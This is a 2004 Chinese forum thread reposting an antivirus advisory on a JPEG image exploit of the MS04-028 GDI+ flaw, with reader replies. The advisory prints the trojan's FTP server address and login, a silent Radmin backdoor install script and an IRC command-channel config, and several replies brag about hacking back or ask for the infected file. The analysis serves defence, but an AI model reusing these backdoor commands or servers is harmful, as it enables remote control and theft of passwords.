[病毒：转帖]首个JPEG病毒携木马来袭病毒攻击第一波

显示全部楼层 · 发表于 30-9-2004 11:32 PM

利用微软新漏洞的图片病毒“图片骇客”（Exploit.Win32.MS04-028.gen）终于现身了，用户在浏览互联网图片时就会被木马病毒感染。这种图片病毒最要命的是用户在不知不觉当中就会中木马病毒，从而被远程计算机得到控制权。金山毒霸反病毒专家认为，如果用户浏览了带毒电子图片，就有可能泄露比如：网络游戏密码、QQ账号、个人银行密码等关键信息，而且这种图片病毒有可能是美女、风景、小动物、甚至是好友的照片！让人防不甚防。

　　据金山毒霸反病毒中心监测，到目前为止这种图片病毒感染的例子还不多，但是这说明利用这个漏洞来传播的图片病毒现身了，第一波图片病毒攻击已经开始。最为可怕的是，以后还会有各种攻击出现，不仅会带木马病毒，包括一些恶性蠕虫、破坏数据的病毒都会以图片病毒作为掩饰来进行破坏。

　　金山反病毒中心介绍，该图片病毒利用MS04-028的GDI+漏洞，如果用户机器没有打相应补丁，并使用资源管理器浏览了该文件，可能导致用户机器从连接木马种植者指定的FTP地址，并从该FTP下载木马文件，并运行这些木马，以达到远程监控感染机器目的。

　　专家提醒：用户应立即打上各种应用程序补丁，如果怀疑机器染毒，电脑用户可查看机器10002端口有无程序访问，以防木马病毒偷盗各种密码。

　　目前，金山毒霸已经进行了紧急病毒库升级，可以防杀利用此漏洞制造的图片病毒。并且免费提供图片病毒专杀工具（下载地址：http://db.kingsoft.com/special/virtusspecial/JPEG/index.shtml），欲了解更多相关信息请登陆http://db.kingsoft.com信息安全网站。

　　技术资料分析：

　　病毒名称:Exploit.JPEG

　　病毒长度:4098

　　威胁级别:二级

　　中文名称:图片骇客

　　病毒别名:

　　Exploit.Win32.MS04-028.gen[AVP]

　　受影响系统:未打MS04-028补丁的英文版WinXP SP1

　　发现时间:9月28日

　　病毒简介:

　　金山反病毒中心介绍，该病毒利用MS04-028的GDI+漏洞，如果用户机器没有打相应补丁，并使用资源管理器浏览了该文件，可能导致用户机器从连接木马种植者指定的FTP地址，并从该FTP下载木马文件，并运行这些木马，以达到远程监控感染机器目的

　　技术细节:

　　当用户通过资源管理器浏览该文件后，病毒会利用GDI+漏洞，尝试溢出执行下载命令。如果溢出失败，则会导致资源管理器崩溃

　　如果溢出成功，则病毒尝试从以下FTP上下载远程控制文件

　　ftp://2××.1××.4×.2×/www/system/

　　文件包括：

　　文件名大小

　　AdmDll.dll 90112

　　Fport.exe 114688

　　ServUStartUpLog.txt 663

　　VNCHooks.dll 32768

　　WinRun.dll 1407

　　WinRun.exe 811008

　　driver.log 1268

　　drives.exe 24576

　　execute.bat 150

　　filter3.ocx 0

　　irc-u.cfg 1052

　　irc-u.dat 0

　　irc-u.debug.log 16802

　　irc-u.dll 102400

　　kill.exe 26624

　　nc.exe 59392

　　nvsvc.exe 241664

　　nvsvc32.dll 36864

　　omnithread_rt.dll 45056

　　peek.exe 34304

　　raddrv.dll 29408

　　radmin.reg 713

　　rcrypt.exe 26112

　　reg.exe 40960

　　uptime.exe 6656

　　vns.exe 208896

　　3、运行execute.bat 文件，通过Radmin远程管理工具，建立后门，端口为10002。

　　4、会建立一个IRC连接，连接到#FurQ频道。

　　0.其他信息:

　　FTP地址如下：

　　ftp://209.171.43.27/www/system/

　　用户名：bawz

　　密码：pagdba

　　execute.bat 内容如下

　　regedit.exe /s radmin.reg

　　nvsvc.exe /install /silence

　　nvsvc.exe /pass:hardcore /port:10002 /save /silence

　　nvsvc.exe /start /silence

　　net start r_server

　　IRC配置文件如下：

　　server1=irc.p2pchat.net

　　port1=7777

　　login=Darkbro0d

　　channel=#FurQ

　　password=letmein

　　nick1=Track100Mbit

　　nick2=Trck100#1

　　sfv=1

　　user=Trackmaster

　　login=darkbro0d

　　目前，金山毒霸已经进行了紧急病毒库升级，可以防杀利用此漏洞制造的图片病毒。欲了解更多相关信息请登陆http://db.kingsoft.com信息安全网站。

[ Last edited by 湖俊 on 1-10-2004 at 08:37 PM ]

emilccp · 发表于 1-10-2004 12:35 PM

感谢分享最新消息哦!!!

smiff · 发表于 1-10-2004 12:42 PM

謝謝你的消息!!!!!!

显示全部楼层 · 发表于 1-10-2004 12:50 PM

我已經中招了
moden無時無刻會自己disconnet
還有刪除的色情軟見
但會自己下載......
果然利害～
不過那個hack我的人
也被我hack回
現在牠只要一上網
就會自動出現1000萬個網站
通常電腦最多承受200各
所以他會自己讓你的電腦癱瘓....
呵呵，要hack就來玩夠本
大家誰要嚐試？
我email給他~

emilccp · 发表于 1-10-2004 12:59 PM

fantasydreamdx 于 1-10-2004 12:50 PM 说 :
我已經中招了
moden無時無刻會自己disconnet
還有刪除的色情軟見
但會自己下載......
果然利害～
不過那個hack我的人
也被我hack回
現在牠只要一上網
就會自動出現1000萬個網站
通常電腦最多承受200各
...

............[size=-2]我不是灌水,是无言以对

戦零 · 发表于 1-10-2004 01:04 PM

fantasydreamdx 于 1-10-2004 12:50 PM 说 :
我已經中招了
moden無時無刻會自己disconnet
還有刪除的色情軟見
但會自己下載......
果然利害～
不過那個hack我的人
也被我hack回
現在牠只要一上網
就會自動出現1000萬個網站
通常電腦最多承受200各
...

實在是無話可説......
嚇呆了......

emilccp · 发表于 1-10-2004 01:19 PM

微软补丁下载：http://www.microsoft.com/china/s ... ns/200409_jpeg.mspx
如果您由于网速或版本问题无法安装微软补丁，请安装江民公司的防毒疫苗程序：
http://update.jiangmin.com/download/KVPatch.exe，该程序不到20K，兼容各个Windows版本，安装后即可对“JPEG漏洞”、“震荡波漏洞”和“冲击波漏洞”永久免疫。

swiss_yen · 发表于 1-10-2004 01:20 PM

fantasydreamdx 于 1-10-2004 12:50 PM 说 :
我已經中招了
moden無時無刻會自己disconnet
還有刪除的色情軟見
但會自己下載......
果然利害～
不過那個hack我的人
也被我hack回
現在牠只要一上網
就會自動出現1000萬個網站
通常電腦最多承受200各
...

怎么hack人家啊？^^

bruceyeo · 发表于 1-10-2004 02:03 PM

感谢分享消息....

ET_Galaxy · 发表于 1-10-2004 02:32 PM

谢谢分享 ~~~ 很好的一个提醒 ~~~
下次我就小心一点了 ~~~

显示全部楼层 · 发表于 1-10-2004 06:25 PM

swiss_yen 于 1/10/04 01:20 PM 说 :

怎么hack人家啊？^^

怎么hack人家啊？^^

我也想知道。

显示全部楼层 · 发表于 1-10-2004 08:20 PM

就是楼就是楼！！！
要怎么hack啊？？？
我也想学^^

然后这个病毒用win98SE的人会中的吗？？？？
我很怕，真的很怕！！！
因为我有时后会去一些教学网站，看教科书。所以就比较。。。。啦

还有你有那张加了料的JPG吗？？？
我想要，你可以寄给我吗？？？
E-mail

谢谢你^^

[ Last edited by ncm1984 on 1-10-2004 at 08:21 PM ]

feliz · 发表于 1-10-2004 09:24 PM

fantasydreamdx 于 2004/10/1 12:50 PM 说 :
我已經中招了

不過那個hack我的人
也被我hack回
現在牠只要一上網
就會自動出現1000萬個網站
...

那个人遇到你真是倒霉哦。。。

显示全部楼层 · 发表于 1-10-2004 11:27 PM

不过竟然你中了会自己清，那他中了也不会坐在那边等死吧。
可能他已经在想要怎么样报酬了，冤冤相报何时了啊！！！

香草 · 发表于 2-10-2004 10:50 AM

yeah~sp2不受这类问题影响~
为什么office update要放cd的？
我没有cd~怎么办~~~

emilccp · 发表于 2-10-2004 11:45 AM

香草于 2-10-2004 10:50 AM 说 :
yeah~sp2不受这类问题影响~
为什么office update要放cd的？
我没有cd~怎么办~~~

没有的话就一定要去买,因为以后需要用到CD的机会有很多

香蕉 · 发表于 2-10-2004 12:10 PM

那个人好可怜哦。。。但你如何fwd的呢？ email给我看看。。

显示全部楼层 · 发表于 2-10-2004 08:04 PM

这样请问有谁知道用win98SE的人会不会中这种病毒？？？？？？？？
我很急想要知道，求求请告知。
谢谢！！！

戦零 · 发表于 2-10-2004 10:12 PM

ncm1984 于 2-10-2004 08:04 PM 说 :
这样请问有谁知道用win98SE的人会不会中这种病毒？？？？？？？？
我很急想要知道，求求请告知。
谢谢！！！

你真的害怕的話，就去裝上這個Update呀。這才是根本之道嗎。

显示全部楼层 · 发表于 3-10-2004 12:44 AM

i get it................................

		自动登录	找回密码
密码			注册

[病毒：转帖]首个JPEG病毒携木马来袭 病毒攻击第一波

所属分类: 电脑手机

[病毒：转帖]首个JPEG病毒携木马来袭病毒攻击第一波